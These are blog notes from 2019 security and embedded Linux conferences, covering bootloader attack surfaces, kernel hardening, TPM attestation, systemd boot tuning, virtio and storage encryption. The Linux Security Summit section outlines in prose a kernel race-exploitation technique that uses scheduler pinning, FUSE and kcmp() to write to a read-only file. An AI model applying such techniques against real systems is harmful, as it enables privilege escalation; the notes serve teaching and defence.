They looked at u-boot, a very commonly used bootloader in embedded systems; Coreboot, which is targeted at modern OSes and used in Chromebooks; Grub, used in most Linux distros; Broadcom CFE; iPXE for network boot; Tianocore; etc.

In most opensource bootloaders, there is no privilege separation: all code runs with maximum privileges. The attack surfaces are NVRAM, files and file systems, busses (I2C/SPI…), etc.

For NVRAM, where environment variables are stored, one should look at where the variables are read, and if there's any kind of sanitization. For u-boot, many places were found where env_get() is called without any sort of size check of the data read. The attack scenario is a device for which NVRAM is modifiable (through hardware or host OS); this is then open for exploitation, for which a demo was shown with u-boot.

For the filesystems attack surface, often the images are read on a filesystem that is not signed or integrity checked. An example was given with grub's ext2 symlink handling.

When looking at TCP/IP, many issues can be found: TLV parsing is tricky for example. DNS can be poisoned, DHCP leases can be stolen. In u-boot, the DNS TID is hardcoded to 1, enabling easy mitm. In broadcom CFE, many memory corruptions were found in DHCP, ICMP handling, IP header length etc.

In iPXE for 802.11, a memory corruption bug was found in SSID handling. Bluetooth was attacked, and issues were found in proprietary bootloaders. The most interesting attack vectors were in large frame handling and fragmentation, but no example was shown because of NDAs.

USB is also a big attack surface when booting from storage or ethernet dongles. Often, descriptor parsing is wrong, with overflows or double fetches causing TOCTOU issues. In Grub, Tianocore and Seabios, memory corruptions and double fetches issues were found. Recent similar issues in proprietary devices include the Nintendo Switch bootloader issue and iPhone checkm8.

Another attack surface is SMM, for which many problems were found with UEFI Tianocore in the last 15 years. A recent issue was found in Coreboot, for which the range checks were simply not implemented yet.

If DMA is an attack surface (rogue device), IOMMUs are an absolute minimum to defend against the attacks. But then you should make sure that any data you get from a device is properly checked, so old driver code needs to be rewritten and audited. There might also be HW bugs in IOMMUs, sidechannels, data leaks, etc. In edkII (Tianocore), the spec mandates shutting down the IOMMU before chainloading to an OS, so it opens a huge window during which a rogue device can do attacks.

The next attack surface is glitching, which means injecting faults in the hardware clocks, voltage sources, or via lasers or EMIs. These hardware side channels are used to extract secrets. Some companies (Chipsec…) also provide optical ROM code extraction by decapping chips.

In conclusion, there's a surprising amount of low quality code in bootloaders (closed and open); and one often encounters NDA walls when looking at proprietary code. The advice is to minimize the image, and turn most extra features off. Enable basic exploit mitigations when compiling. In all of this, Tianocore is well ahead of the game.

The authors called on the audience to take action in reviewing, fuzzing, and analysing bootloaders.

That's it for 36C3 ! Most talks were recorded with videos already available.

Linux Security Summit Europe 2019

2019-10-31T16:00:00+01:00

Following my ELCE notes, you'll find below my notes for some of the talks at the Linux Security Summit Europe 2019.

Exploiting race conditions using the scheduler — Jann Horn

The first bug Jann talked about is a race between mremap and fallocate. mremap allows moving a memory mapping from an address to another. The associated page table entries are moved as well, and then the TLB is flushed.

fallocate allocates and de-allocates space for a file. It interacts with the page cache so it's possible to exploit a race between the page table modification and the TLB flushing.

To widen the race-exploitation window, the scheduler is used. The approach is to pin two of your own tasks to the same CPU, and set one of the tasks to idle (low) priority; it's then possible to interrupt the idle task, even when it's inside the kernel, simply by having the other task being active. This is used to have a syscall take much longer than needed, and make the race window also last longer.
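The scheduler setup itself (not the exploit) only needs two standard Linux calls, which Python exposes in the os module. A minimal sketch of the setup as I understood it from the talk; the helper names are made up, and this is Linux-only:

```python
import os


def pin_to_cpu(cpu):
    """Restrict the calling process (pid 0 means self) to a single CPU."""
    os.sched_setaffinity(0, {cpu})


def make_idle():
    """Move the calling process to the SCHED_IDLE policy (lowest priority)."""
    os.sched_setscheduler(0, os.SCHED_IDLE, os.sched_param(0))


# Hypothetical layout: both tasks call pin_to_cpu() with the same CPU, the
# task doing the slow syscall also calls make_idle(), and the other task
# becomes runnable at the right moment to preempt it.
```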

The second example is a refcount decrement on struct file.

Both userfaultfd and FUSE allow handling page faults in userspace.

The kcmp syscall, made for checkpoint/restore in userspace, is useful for reliable Linux use-after-free exploitation. It compares two processes' kernel resources (file descriptors) to determine if they are sharing pointers.

The combined exploitation then creates a FUSE mapping, opens a writable file, and makes a write that then blocks on FUSE. It then opens another read-only destination file and verifies with kcmp() that the same file structure is reused, before resolving the FUSE page fault and writing to the destination (forbidden) file.

The third bug uses getpidcon(); it exploits an issue in Android binder that used the caller PID to get the context, before then making a decision based on this.

Here the race window is widened by creating an artificial priority inversion inside the kernel, which mutexes are vulnerable to. This is done by interacting with the VFS's mutexes with userfaultfd.

Kernel Runtime Security Instrumentation — KP Singh

Signals from Audit or perf can correlate with malicious activity, but not necessarily. LSM errors and denies are Mitigations that deny certain actions. You need both to have security.

To detect a new attack, you need both an Audit update (to log new events), and a mitigation update (e.g. a new LD_PRELOAD signature).

KP gave a few examples of Signals: for example a process that runs and deletes its binary. For Mitigations, the first example was to have a dynamic whitelist of known Kernel modules. The point is that both go hand in hand, and you need both.

KP says they want to implement KRSI with eBPF; LSM hooks should be implemented as eBPF programs. The LSMs are a good match because they map to security behaviours, are associated with kernel data structures with "blobs", and benefit from years of research and verification of the LSM system. It also benefits the LSMs because the framework can then get extended from security analysts feedback.

With this eBPF infrastructure, both actions are possible on an LSM action: returning an error and/or logging an audit event.

The new BTF format helps with eBPF programs because now the addresses of symbols are distilled in a compact format, allowing to read inside kernel data structures in a version and platform-independent way.

KP showed an example BPF program that denies a process unlinking its own executable (or a parent's, or another process's), or that logs a write to /proc/self/mem.

Compared to the landlock patchset, KP says that KRSI has different roles: the goal is to do system-wide MAC, not unprivileged DAC.

Performance-wise, the latency impact of KRSI is three times lower than audit, and with less variation.

Address space for namespaces — Mike Rappoport

Address space isolation is one of the best protection methods since the invention of virtual memory, Mike says.

Page Table Isolation (PTI) is the first example of this type of isolation. There is other work in progress, like KVM address space isolation or process local memory.

Mike's group at IBM wants to improve container isolation; a way to do that can be to assign dedicated page tables to namespaces.

Previously, they tried something called System Call Isolation (SCI), to run system calls with very limited page tables, but it didn't provide enough guarantees, and had a heavy performance impact. Another thing they worked on was mmap(MAP_EXCLUSIVE) to create private memory mappings that can't be accessed by the rest of the system. A similar thing was done with a char device mapping: it can transfer the rights with SCM_RIGHTS, and doesn't need a new page flag.

The Address spaces for namespaces approach would have processes within a namespace sharing a page table, but their mappings wouldn't be available outside of that namespace. A first version was built for netns in order to have an isolated network stack for network namespaces. Even the internal kernel pages and objects aren't visible outside of the namespace. It required extending alloc_page() and kmalloc().

The proof of concept implementation still does not work, but there is good hope that it can be improved.

Using a different LSM from the Host in a Container — John Johansen

The main use case to have a different LSM in a container is cross-distro container running: e.g, Fedora (selinux) inside a container on Ubuntu(apparmor), or an Android (selinux) inside something else.

LSM Stacking is very similar to what needs to be done here, so one can leverage it for this use case.

But an issue John found is that LSM order matters. His first tries with apparmor (main LSM), then selinux (stacked) failed to boot, because in Ubuntu dbus is built with both apparmor and selinux. It finds that selinux is enabled, and then when initializing apparmor, it thinks it already has an (empty) policy. That was the first gotcha.

Then, another gotcha was selinux was blocking apparmor code.

There also needs to be a way to namespace LSMs: inside a chroot (or container), you don't want an applied policy to impact the whole system.

In order to do that, Apparmor implements virtualization of parameters, policy, etc. That's the way to be namespace aware, and it will need to be done in every LSM.

Another issue that was encountered was securityfs, which isn't multi-mount capable, so a non-container aware image can't boot because it would fail to mount it.

It's also not possible to use seccomp and no_new_privs. So to work around that, AppArmor support for no_new_privs with stacking was added: at lockdown, the apparmor confinement is saved, and then checked again whenever necessary to make sure it's enforced properly.

Container nesting is also another issue. There are specifically issues around user namespaces: for example there's no way to know when a user namespace is created; new LSM hooks are probably missing to fix these issues.

It's now possible to run an Ubuntu container on Fedora, with the help of LXD (handling mappings, etc.).

Keylime: Open Source software for remote trust — Luke Hinds

Traditionally, software trust used to reside in memory or disks. TPMs changed this by providing hardware-backed software trust sources. They are now ubiquitous, and used pervasively across various industries.

The basic model relies on an RSA keypair, with the private key being inaccessible to software. A TPM can hash critical sections of firmware, a boot process, and then those hashes can be made public and verified with the public key.

Keylime is a remote trust framework using TPMs. TPM 2.0 and 1.2 are supported, but the latter will be deprecated. It provides Measured Boot (for firmware, shim, grub, kernel, etc.), it can measure secure boot (EFI DBX, MokListX, etc.), and an IMA Runtime for attestation. It's possible to have encrypted payload execution, depending on the previous measurements, which would then unwrap appropriate keys. Keylime also has a revocation framework.

In the target node (IoT / Edge platform / Provider Cloud), the Keylime Agent runs, with the TPM software stack. On the trusted infrastructure, the Keylime server runs, with these components: Verifier, Registrar, Revocation Service, and Keylime CA.

It's possible to have many nodes, and multiple combinations of verifiers.

Enrollment relies on the TPM-backed hardware keys. Once it is done, the keylime infrastructure (Verifier and Registrar) will provide a way for a tenant to access an enrolled node, and send it a cryptographically secure payload.

With IMA, it's possible to have continuous remote attestations (with polling). When an attacker triggers an IMA error, the Keylime Verifier will notice, and the revocation mechanisms can kick in. The Keylime Verifier will send a signed revocation event to all nodes, for example to revoke trust to the compromised node.

The Keylime project is active, has documentation and working CI. Luke would of course like to have even more contributors.

The agent is being ported from Python to Rust for performance and security reasons. Support for virtual TPM (vTPM) is being worked on as well, while still binding it to the hardware TPM's cryptographic trust.

Securing TPM Secrets with Intel TXT and Kernel Signatures — Paul Moore

Paul's goal is to store secrets in the TPM, and only allow access to these secrets to authorized kernels. He also wants this to work on both UEFI Secure boot systems and legacy BIOS systems.

The approach is to seal TPM secrets against a set of PCR values. With secure boot, these values are measurements of the system state: firmware, bootloader, kernel, etc.
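To make the sealing idea more concrete, here is a minimal Python sketch of how a PCR accumulates measurements, assuming a SHA-256 bank. The extend rule (new value = hash of the old value concatenated with the measurement digest) is standard TPM behaviour; the component names and the `seal_policy_matches` helper are hypothetical and only illustrate why any change in the measured chain changes the final value, and therefore blocks access to the sealed secret.

```python
import hashlib

PCR_SIZE = 32  # SHA-256 bank: a PCR starts as 32 zero bytes


def extend(pcr: bytes, data: bytes) -> bytes:
    """Return the PCR value after extending it with a measurement of `data`."""
    digest = hashlib.sha256(data).digest()
    return hashlib.sha256(pcr + digest).digest()


def measure_chain(components: list[bytes]) -> bytes:
    """Extend an all-zero PCR with each boot component, in order."""
    pcr = bytes(PCR_SIZE)
    for blob in components:
        pcr = extend(pcr, blob)
    return pcr


def seal_policy_matches(expected_pcr: bytes, components: list[bytes]) -> bool:
    """Hypothetical stand-in for unsealing: succeeds only if the PCR matches."""
    return measure_chain(components) == expected_pcr


if __name__ == "__main__":
    boot = [b"firmware", b"bootloader", b"kernel-1.0"]  # illustrative blobs
    expected = measure_chain(boot)
    print(seal_policy_matches(expected, boot))
    print(seal_policy_matches(expected, boot[:2] + [b"kernel-1.1"]))
```

This also shows why hashing the kernel image itself gives unstable PCRs: every kernel update changes the last measurement, whereas measuring the signing authority does not.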

For UEFI Secure boot, PCR 7 is a hash of the kernel signing authority; it's stable across kernel updates with the same signer.

With Intel TXT, the hardware and firmware create a dynamic root of trust; it uses the tboot bootloader, which makes a hash of the kernel image. But that hash isn't stable across updates, so the PCRs are unstable.

So Paul's solution to this is to extend tboot to support the UEFI PECOFF signature format. Its verification is rooted in the TPM; and it then updates the PCRs.

The prototype code has been released.

Work is still needed on command line and initrd verification, but the solutions that were applied with UEFI secure boot could work.

That's it for this edition of LSS EU!

ELCE, OS Summit and KVM Forum 2019 notes

2019-10-31T00:00:00+01:00

After a two-year hiatus, I couldn't miss this year's ELCE happening in Lyon, the first in France since the one in Grenoble 10 years ago, which coincidentally was one of my first conferences. The OS Summit and KVM Forum events are co-located and covered by the same ticket, which is nice, and why I attended a few talks there as well.

Making device identity trustworthy with TPMs — Matthew Garrett and Brandon Weeks

For access to any internal Google Service (BeyondCorp), both the user and the device need to be authenticated. The devices that are allowed need to be well-known and inventoried.

A device identity needs to be unique (serial number), bound to hardware and stable for the lifetime of the device. It should also be unforgeable and resistant to tampering.

Existing solutions are inadequate: self-identification can be forged, keys on disk can be duplicated, and trust bootstrapping is hard, especially remotely.

TPMs are specific chips that provide a store and generation for keys that never leave the hardware: they can't be extracted and duplicated to other hardware. Modern TPMs allow tracking the hardware manufacturer, thanks to endorsement keys (EK): they provide proof that a TPM comes from a certain manufacturer. Attestation Keys (AK) are then used to prove whether a key has been generated on a specific TPM.

An issue is that TPMs aren't directly related to devices. A solution to that is runtime binding: run a script that extracts the TPM EK and places it in an internal database. But an issue with this is that you don't know if the device state can be trusted at this time, or if the TPM is indeed internal to the device.

Binding at provisioning helps with this by reducing the window where a system could be compromised by having an IT officer do this operation before it's given to a user. But it's still dependent on having a well-functioning inventory system.

Binding at manufacture goes even further: it maps a given device with a TPM with the help of Platform Certificates. Those are sent out-of-band at device ordering.

The lifecycle then looks like this:
- first, the device is provisioned: at this point an Attestation Key is generated by the TPM, and both the EK and AK are registered through the Attestation CA
- then, a client certificate is issued: it is signed by the AK
- the client certificate is then provided to the access gateway as part of mutual TLS auth to access services.

Another possibility, once you know how to bootstrap device trust, is to use TPM-backed trust to authenticate services, for example.

The low level code, including Platform Certificates parsing has been released here.

What's new in Buildroot — Thomas Petazzoni

Two years ago, LTS support was added: the February release is maintained for a year for security updates and bug fixes.

Internal toolchain support has been updated, with new gcc, binutils, and various libc versions. They are now tested automatically for architectures supported by qemu. External toolchains have been updated as well. It's also now possible to declare external toolchains from BR2_EXTERNAL.

Two new common package infrastructures were added for go and meson packages.

Git caching has been improved, for git-fetched packages; as well as the whole package download infrastructure which has been rewritten.

Many packages were updated, and added; a few obsolete ones have been removed.

New global options have been added to force building with security-related options (relro, stack protection, etc.)

A new make show-info was added to dump the state of enabled packages as a json to be used by external tools.

Work has been done to improve the testability of reproducible builds, as part of a GSoC: if BR2_REPRODUCIBLE=y, the build is done twice, and the outputs of the two are compared with diffoscope.

Work has also continued to improve parallel builds; one of the last series on the subject is on the per-package directories for HOST.

The runtime test infrastructure has been improved to add more tests. The tooling around buildroot has been augmented with the support of release-monitoring.org to track packages that are outdated.

Boot time optimization with systemd — Chris Simmonds

systemd runs as init, so it's PID 1. It launches and monitors daemons, configures stuff, etc.

For embedded systems, systemd is a much bigger init system, with 50 binaries and a 34MB footprint. It supports many features: event logging with journald, user login with logind, device management with udevd, etc.

systemd has many features: resource control, parallel boot for free, the ability to boot a system without a shell, etc. It has units (a generic type), services (a given job), and targets (a group of services, e.g. a runlevel).

systemd searches for units first in /etc/systemd/system for local configuration, then in /run/systemd/system for runtime config, then in /usr/lib/systemd/system .
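As a rough illustration of that lookup order, here is a small Python sketch that returns the first matching unit file. It is a simplification under stated assumptions: `find_unit` is a hypothetical helper, only the three directories named above are searched, and drop-ins, masking and the other paths systemd really considers are ignored.

```python
from pathlib import Path
from typing import Optional

# Search order as described above: local config, runtime config, packaged units.
UNIT_DIRS = ["/etc/systemd/system", "/run/systemd/system", "/usr/lib/systemd/system"]


def find_unit(name: str, search_dirs=UNIT_DIRS) -> Optional[Path]:
    """Return the first file called `name` found in `search_dirs`, or None."""
    for directory in search_dirs:
        candidate = Path(directory) / name
        if candidate.is_file():
            return candidate
    return None


if __name__ == "__main__":
    # Prints the path that would win for this unit name on the current machine.
    print(find_unit("getty@.service"))
```

The practical consequence is that a file dropped in /etc/systemd/system shadows the packaged unit of the same name, which is handy when trimming a generic image.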

Units can depend on each other, with three types of dependencies: Requires= describes a hard dependency, Wants= is a weaker one, meaning the unit won't be stopped if the dependency fails, and Conflicts= states that two units cannot run together.

systemd also provides another concept: ordering. Before= and After= determine when a unit is started. This is used, for example, to start a web server unit after network.target. Without ordering, units are started in no particular order.
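Ordering constraints form a directed graph, and a valid start sequence is a topological sort of it. The Python sketch below shows the idea with the standard `graphlib` module; the unit names are hypothetical, and real systemd starts independent jobs in parallel rather than producing a single linear list.

```python
from graphlib import TopologicalSorter

# Hypothetical units: each one maps to the units it is ordered after.
after = {
    "network.target": [],
    "web-server.service": ["network.target"],
    "metrics.service": ["web-server.service"],
    "getty.service": [],
}


def start_order(after_deps: dict[str, list[str]]) -> list[str]:
    """Return one valid start order honouring every ordering constraint."""
    return list(TopologicalSorter(after_deps).static_order())


if __name__ == "__main__":
    print(start_order(after))
```

Units without any constraint (getty.service here) can land anywhere in the result, which matches the "no particular order" behaviour described above.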

At boot, systemd starts the default.target. On most systems, this is by default a symbolic link to the multi-user.target.

It's also possible to describe a reverse dependency with WantedBy=, which is used to add services to be started by a target, for example WantedBy=multi-user.target. This is implemented by creating a symbolic link in the multi-user.target.wants directory.

systemctl is the cli tool used to interface with systemd at runtime.

How to reduce boot time then ?

Boot time is defined as the time from power-on to the critical app running.

When using a generic system image (yocto, debian), those are designed conservatively to cater to all common cases. So to reduce boot time, one should make it less generic, either by disabling services, or reducing their dependencies.

The main tool to optimize boot time is systemd-analyze, which can give you a summary of the boot time; systemd-analyze blame lists units by order of start-up time. The most important is systemd-analyze critical-chain, which shows the time for the units in the critical path.

In an example, Chris showed that the critical chain depended on a timeout caused by a non-existent ttyGS0; removing the associated getty unit saved a lot of time. Changing the default target and disabling unused daemons also helped a lot.

Other useful features in embedded systems

The watchdog is a very useful feature of systemd: if a service does not reply to the watchdog, it can be restarted automatically. It's even possible to force a reboot if the watchdog has been triggered more than a given number of times.
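On the service side, replying to the watchdog means sending a periodic keep-alive over the notification socket. The talk did not go into this level of detail, so the following Python sketch is based on the sd_notify protocol as I understand it (a datagram containing `WATCHDOG=1` sent to the socket named in `NOTIFY_SOCKET`, with the timeout exposed in `WATCHDOG_USEC`); the helper names are my own.

```python
import os
import socket
from typing import Optional


def sd_notify(state: str) -> bool:
    """Send a notification to the service manager; False if not supervised."""
    path = os.environ.get("NOTIFY_SOCKET")
    if not path:
        return False
    if path.startswith("@"):
        # A leading "@" denotes a Linux abstract socket (leading NUL byte).
        path = "\0" + path[1:]
    with socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) as sock:
        sock.sendto(state.encode(), path)
    return True


def watchdog_interval_seconds() -> Optional[float]:
    """Half of WATCHDOG_USEC, a commonly used ping period, or None if unset."""
    usec = os.environ.get("WATCHDOG_USEC")
    return int(usec) / 2 / 1_000_000 if usec else None


if __name__ == "__main__":
    # Outside of systemd both values simply report that no watchdog is configured.
    print(sd_notify("WATCHDOG=1"), watchdog_interval_seconds())
```

A service would call `sd_notify("WATCHDOG=1")` from its main loop, so that a hang in the critical path stops the keep-alives and lets systemd react.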

Resource limits like CPU and memory limiting can also be very useful; this is implemented through cgroups.

Crypto API: using hardware protected keys — Gilad Ben Yossef

In the Linux crypto API, there are transformation providers, which can use dedicated hardware, specialized instructions or a software implementation. They are used by the crypto user API, dm-crypt or ipsec for example.

The crypto API is used in multiple steps:
- crypto_alloc_skcipher, for example to get an xts(aes) transformation handle
- set the key on the tfm
- get a request handle
- set the request callback
- set input, output, IVs
- etc.

Transformation providers have a generic name (the algorithm), a driver name (the implementation), and a priority, to know which one is preferred. There are other properties describing the synchronicity, min/max keysize, etc.
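The interplay between generic name, driver name and priority can be modelled in a few lines of Python. This is only a sketch of the selection logic as I understand it, not kernel code: the registry, the driver names and the priority values are all made up for illustration.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Provider:
    name: str         # generic algorithm name, e.g. "xts(aes)"
    driver_name: str  # specific implementation
    priority: int     # higher wins when several providers share a name


# Hypothetical registry; driver names and priorities are illustrative only.
REGISTRY = [
    Provider("xts(aes)", "xts-aes-generic", 100),
    Provider("xts(aes)", "xts-aes-simd", 300),
    Provider("xts(aes)", "xts-aes-hwaccel", 400),
]


def lookup(requested: str, registry=REGISTRY) -> Optional[Provider]:
    """Match an exact driver name first, else pick the best-priority provider."""
    for provider in registry:
        if provider.driver_name == requested:
            return provider
    candidates = [p for p in registry if p.name == requested]
    return max(candidates, key=lambda p: p.priority, default=None)


if __name__ == "__main__":
    print(lookup("xts(aes)"))         # best implementation of the algorithm
    print(lookup("xts-aes-generic"))  # one specific implementation
```

Requesting by driver name is what makes it possible to pin a specific hardware implementation, which matters when the key material only makes sense to that hardware.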

The key is usually just stored in RAM, like everything else. This makes it vulnerable to various key-extraction attacks. It should be possible to have a transformation provider that supports a hardware-backed key.

It was implemented a few years ago for IBM mainframes, which means that the infrastructure could be reused for embedded devices.

In the implementation, it means the user of the API would pass a tag instead of the key bytes. The tag describes a storage and key from inside a secure domain. The tag can be an index, or an encrypted key in case of key ladder.

In practice the security of this key depends on the security of the secure domain (hardware or software, e.g tee), its provisioning, etc.

The cipher's name is prefixed with 'p', for example "paes", for protected key. Because the tag value is specific to hardware implementation, when requesting a cipher, the specific name of the driver is used instead of just the algorithm name.

When instantiating it with dm-crypt, one should use the crypto-api algo driver name and instead of the key, a tag describing the key (e.g key slot).

A future challenge is that TPMs act very much in the same way, yet aren't using the same API.

iwd - state of the union — Marcel Holtmann

iwd 1.0 has been released on this day (October 30th 2019)

Marcel says Wi-Fi on Linux sucks. It's because the roles are split between many projects (kernel, wpa_supplicant, dhcpcd, network manager, etc.), and there's still a lot of code to write on top of this to ship a consumer product.

iwd's goal is to consolidate the wifi information in one place, which is then used by network-manager. The goal is to only have one entity interacting with nl80211 for better performance.

For example, when you wake up your laptop, you don't want to rescan the ever-growing list of channels before re-joining a network.

In addition to being the central known-network database, iwd has many features:
- it has optimized scanning since it's the only daemon to do scanning in a system
- it can do enterprise provisioning
- it supports fast roaming and transitions
- it supports WPA3 and OWE (Opportunistic Wireless Encryption), and no UI change was needed to add this support
- there's an integrated EAP engine that uses the kernel keyring system
- it supports the Hotspot 2.0 spec
- push-button methods work (WPS, etc.)
- address randomization is supported
- AP mode is supported to do tethering

Enterprise provisioning can be very complex. Most OSes have a lot of settings that are hard to manage, etc. With Windows 10 and iOS there's now a downloadable configuration file, like for OpenVPN for example.

iwd now supports configuration files with embedded certificates so that everything can be in a single file. An enterprise admin can now provide this configuration, the user installs it, and connects to the network. This format is documented in the manpage man iwd.network.5. Unfortunately, there's still no standard for Wi-Fi provisioning, and Marcel wants to address that.

Marcel says that in some cases, just the overhead of communicating with other daemons (systemd-networkd, connman or network-manager) in order to trigger dhcp, is too big. Some systems also don't necessarily have those daemons. That's why iwd added support for an experimental DHCPv4 daemon. This is documented in iwd.config.5.

The goal with iwd is to complete a connection in 100ms or less (with an IP address). Right now, it's not there yet. PAE in the kernel nl80211 interface helps reduce this. Address randomization adds 300ms on top of this. In Android, it can add up to a 3s penalty, because one needs to power down the phy and power it up again with Linux. There's work in the kernel to reduce this time as well, but it's not there yet, Marcel says.

iwd does not depend on wpa_supplicant, and has improved a lot.

Marcel says they have reached the limit of what is possible to improve inside iwd. There needs to be other features in nl80211 to continue doing optimizations.

iwd has 40k SLOC, which might be a lot, but only a tenth of wpa_supplicant.

There are other daemons in the works: ead for ethernet authentication; its code is in the repo, and still being worked on.

apd, the access point daemon is still private and being prototyped and should land next year in the repo.

rsd, a resolving service daemon, is pretty much a replacement for systemd-resolved; the DNS part is quite tricky according to Marcel; the goal is to be able to choose the correct path (e.g. through a proxy or not) for a given URL. It's not planned to be released anytime soon though.

VirtIO without the Virt: towards implementations in hardware — Michael Tsirkin

virtio enables re-utilisation of drivers that are already in the OS. There are already many types of devices that are supported.

Hardware helps implement userspace drivers, that can also be simpler. Another motivation for hardware virtio would be passthrough for performance, while retaining the advantages of software implementations.

If there is a precise virtio spec, when a bug happens it's possible to find if it's the fault of the driver or the card. If you have hardware, you can switch to a different card or software implementation to find out.

Virtio feature negotiation allows implementing only certain features in the driver or hardware, and then using only the intersection.

For virtio-net, the virtualized hardware uses PCI, so it's possible to forward guest access to real hardware by giving it access directly to hardware memory range for example.

The virtio ring has a standard lockless access model that looks a lot like the DMA systems that hardware vendors are used to implementing.

Depending on the hardware, there might be cache coherency issues, which means that hardware needs different feature flags, in particular VIRTIO_F_ORDER_PLATFORM and VIRTIO_F_ACCESS_PLATFORM. Version 1 needs to be implemented as well, without the legacy interface.
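Feature negotiation boils down to a bitwise intersection of what the device offers and what the driver understands. Here is a minimal Python sketch; the bit numbers are the ones I believe the virtio 1.1 specification assigns to these flags and should be checked against the spec, and `acceptable_for_hardware` is a hypothetical policy function, not part of any API.

```python
# Bit numbers assumed from the virtio 1.1 specification; check them against the spec.
VIRTIO_F_VERSION_1 = 1 << 32
VIRTIO_F_ACCESS_PLATFORM = 1 << 33
VIRTIO_F_ORDER_PLATFORM = 1 << 36


def negotiate(device_features: int, driver_features: int) -> int:
    """Both sides may only use the features they have in common."""
    return device_features & driver_features


def acceptable_for_hardware(negotiated: int) -> bool:
    """Hypothetical policy: a hardware device refuses the legacy interface."""
    return bool(negotiated & VIRTIO_F_VERSION_1)


if __name__ == "__main__":
    device = VIRTIO_F_VERSION_1 | VIRTIO_F_ACCESS_PLATFORM | VIRTIO_F_ORDER_PLATFORM
    driver = VIRTIO_F_VERSION_1 | VIRTIO_F_ACCESS_PLATFORM
    print(hex(negotiate(device, driver)))
```

With this model, a driver that does not know about VIRTIO_F_ORDER_PLATFORM simply never sees it negotiated, and the device can decide whether it is able to operate without it.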

The simplest way to implement hardware virtio is to just use passthrough; for example, if a network card implements the spec properly, just pass-through everything. Another possibility is to only have data path offloading: the control path is intercepted in an mdev driver.

It would also be possible to do partitioning in the last case, by tagging requests for a given virtqueue depending on each VM if we want to share a device between VMs. Another use of the mdev driver is for migration: force it to a matching subset of features between two machines, and then do the migration between the two transparently.

If there are device quirks, the best way to address that is to use feature bits instead.

The Virtio 1.2 spec is planned to be frozen by the end of November 2019. When adding a device to the spec, an ID should be reserved, as well as a flag for new features.

Authenticated encryption storage — Jan Lübbe

It's possible to integrate authentication and encryption at various layers of the storage stack, from userspace, filesystems and VFS to device-mapper.

With dm-verity, a tree of hashes is built, and the root hash is provided out-of-band (kernel command line), or via signature in super block since Linux 5.4. It's the best choice for read-only data.
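The tree of hashes can be sketched in Python as follows. This is a deliberately simplified binary Merkle tree, assuming SHA-256 and 4096-byte blocks; it is not the dm-verity on-disk format, which packs many hashes per hash block and adds a salt.

```python
import hashlib

BLOCK_SIZE = 4096  # assumed data block size


def h(data: bytes) -> bytes:
    """SHA-256 digest of `data`."""
    return hashlib.sha256(data).digest()


def root_hash(image: bytes) -> bytes:
    """Hash every block, then hash pairs of hashes until one root remains."""
    level = [h(image[i:i + BLOCK_SIZE]) for i in range(0, len(image), BLOCK_SIZE)]
    if not level:
        level = [h(b"")]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])  # duplicate the last hash on odd levels
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]


if __name__ == "__main__":
    image = bytes(4 * BLOCK_SIZE)  # four zeroed blocks as a stand-in image
    print(root_hash(image).hex())
```

Only the root needs to be trusted (hence passing it out-of-band): flipping a single bit anywhere in the image changes it, and a single block can be verified by walking one path of the tree rather than rehashing everything.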

dm-integrity arrived in Linux 4.12, and provides integrity for writing as well. There's one metadata block for n data blocks, and they are interleaved. It needs additional space, and has a performance overhead, because a write happens twice because of journalling (for both data and metadata) to prevent power issues.

dm-crypt handles sector-based encryption with multiple algorithms. It's length preserving, which means that data cannot be authenticated. It's a good choice for RW block devices without authentication.

Recently, dm-crypt added support for authentication as well with AEAD cipher modes. But it authenticates individual sectors, so replay is possible (is it the last version ?). The recommended algorithm is AEGIS-128-random.
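The replay weakness of per-sector authentication is easy to demonstrate. In the Python sketch below, an HMAC over the sector number and its content stands in for the AEAD tag (an assumption made to stay within the standard library; there is no encryption here): an attacker who kept an old copy of a sector and its tag can write both back, and verification still succeeds.

```python
import hashlib
import hmac


def tag(key: bytes, sector_no: int, data: bytes) -> bytes:
    """Per-sector authentication tag, bound to the sector number only."""
    message = sector_no.to_bytes(8, "little") + data
    return hmac.new(key, message, hashlib.sha256).digest()


def verify(key: bytes, sector_no: int, data: bytes, stored_tag: bytes) -> bool:
    """Check a sector against its stored tag in constant time."""
    return hmac.compare_digest(tag(key, sector_no, data), stored_tag)


if __name__ == "__main__":
    key = b"k" * 32
    old = (b"balance=100", tag(key, 7, b"balance=100"))
    new = (b"balance=0", tag(key, 7, b"balance=0"))
    print(verify(key, 7, *new))  # current content of sector 7
    print(verify(key, 7, *old))  # stale content written back to sector 7
    print(verify(key, 8, *old))  # stale content moved to another sector
```

Both the current and the stale sector verify, because nothing ties a sector to the state of the rest of the device; only moving it to a different sector number is detected. A tree with a single authenticated root, as in dm-verity, does not have this problem.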

fsverity is now "dm-verity for files", and has been integrated into ext4. A single (large) file has a root hash (provided out-of-band), and once written, is then immutable. The biggest user is likely Android for .apk files.

fscrypt has the same idea of encryption at the file level. It's interesting for a multi-user system where each user has its own keys. It's possible to mount a filesystem and remove files without having the keys. It also has no authentication.

Since Linux v4.20, UBIFS can provide authentication. The root hash is authenticated via HMAC or signature since Linux 5.3. It's the only FS that authenticates both data and metadata. It's the best choice for raw NAND/MTD devices.

ecryptfs is a stacked filesystem (mounts on top of another fs), and was used by Ubuntu at some point for per-user home directory encryption, but has now been superseded by fscrypt.

IMA/EVM was initially developed for remote attestation with TPMs, and uses extended attributes. It protects from file data modification, but it is vulnerable to directory modifications (file move/cp).

Master key storage is also problematic, and platform dependent. Many SoCs provide key wrapping to encrypt secrets per-device, but it needs a secure boot chain. Other possibilities include using a TPM or (OP-)TEE.

Authenticated writable storage can only detect offline attacks, not runtime ones, so there's a need for a read-only part of the system (recovery) in order to be able to restore the system to a good state.

How to analyze device problems from devices that are returned from the field ? There might be the need for a mode to erase the keys (protects the data) and disable authenticated boot (for HW analysis).

That's it ?

If you want more notes, I invite you to read Arnout Vandecappelle's at Mind Embedded Development's blog.

I'm also attending Linux Security Summit, so stay tuned!

What are you working on ?

2019-10-20T00:00:00+02:00

This was previously published on LinkedIn

Until very recently I couldn’t really answer this question. But it has shipped, so now I can tell you: I've been working on Edge Computing.

To be more precise, this is the first compute service available to ISP subscribers directly on their ISP gateway.

